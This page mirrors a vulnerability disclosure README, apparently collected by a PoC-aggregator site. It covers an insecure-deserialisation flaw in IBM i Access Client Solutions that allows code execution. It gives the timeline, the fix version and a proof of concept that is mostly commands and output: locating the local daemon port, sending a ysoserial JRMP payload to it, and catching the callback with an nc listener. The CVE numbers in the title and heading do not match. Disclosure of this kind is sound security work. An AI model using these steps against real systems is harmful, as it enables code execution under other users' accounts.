Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-45185 PoC — IBM i 代码问题漏洞

Source
https://github.com/afine-com/CVE-2023-45185
Associated Vulnerability
Title:IBM i 代码问题漏洞 (CVE-2023-45185)
Description:IBM i是美国国际商业机器(IBM)公司的一套运行在IBM Power Systems和IBM PureSystems中的操作系统。 IBM i Access Client Solutions 1.1.2版本至1.1.4版本、1.1.4.3版本至1.1.9.3版本存在代码问题漏洞,该漏洞源于权限检查不当,可能允许攻击者执行远程代码。
Description
IBM i Access Client Solutions < 1.1.9.4 - Remote code execution via insecure deserialisation
Readme
# CVE-2023-45184
IBM i Access Client Solutions < 1.1.9.4 - Remote code execution via insecure deserialisation.

## Timeline
- Vulnerability reported to vendor: 22.09.2023
- New fixed 1.1.9.4 version released: 08.12.2023
- Public disclosure: 15.12.2023

## Description

IBM i Access Client Solutions uses insecure deserialisation for password storage and obtaining decryption key for password encryption. This could be used by local or remote attacker to execute code. 

The local server can be easily found using the `netstat' command:
```
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ netstat -nltp | grep java
tcp6       0      0 :::34307                :::*                    LISTEN      3225094/java         off (0.00/0/0)
```

We can confirm details about this local server using the `ps` command:
```
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ ps aux | grep java
mmajchr+ 3224938  6.8  0.9 13305316 301392 pts/6 Sl+  12:30   0:17 java -jar ./acsbundle_1.9.new.jar
mmajchr+ 3225094  0.3  0.2 11512420 79692 pts/6  Sl+  12:30   0:00 /usr/lib/jvm/java-17-openjdk-amd64/bin/java -Djava.class.path=/tmp/ACS.lm13910263510749358977.jar -Dvisualvm.display.name=ACS Daemon -Dcom.ibm.tools.attach.displayName=ACS Daemon com.ibm.iaccess.base.LmHybridServerImpl
mkubiak  3238934  0.0  0.0   6464  1992 pts/12   R+   12:44   0:00 grep --color=auto java
```

We can achieve code execution by the user `mmajchrowicz` using the `ysoserial` payload from the `mkubiak` account:
```
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ id
uid=1012(mkubiak) gid=1012(mkubiak) groups=1012(mkubiak),27(sudo)

┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ java -jar ysoserial.jar JRMPClient '127.0.0.1:9191' > jrmp.bin

┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ (sleep 3; cat jrmp.bin) | nat -6 ::1 34307 

```

In second terminal we will receive connection after execution of payload by service:
```
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ nc -lvnp 9191
listening on [any] 9191 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 38012
JRMIK

┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$
```

This problem was caused by an insecure deserialisation of network packets and user data. This issue is fixed in IBM i Access Client Solutions 1.1.9.4.

## Affected versions
< 1.1.9.4

## Advisory
Update IBM i Access Client Solutions to 1.1.9.4 or newer.

### References
* https://www.ibm.com/support/pages/node/7091942
* https://nvd.nist.gov/vuln/detail/CVE-2023-45185
File Snapshot

 [4.0K]  /data/pocs/ac1c412ee53976dad6a25ec413e40b55d71a849c
├── [ 34K]  LICENSE
└── [2.5K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.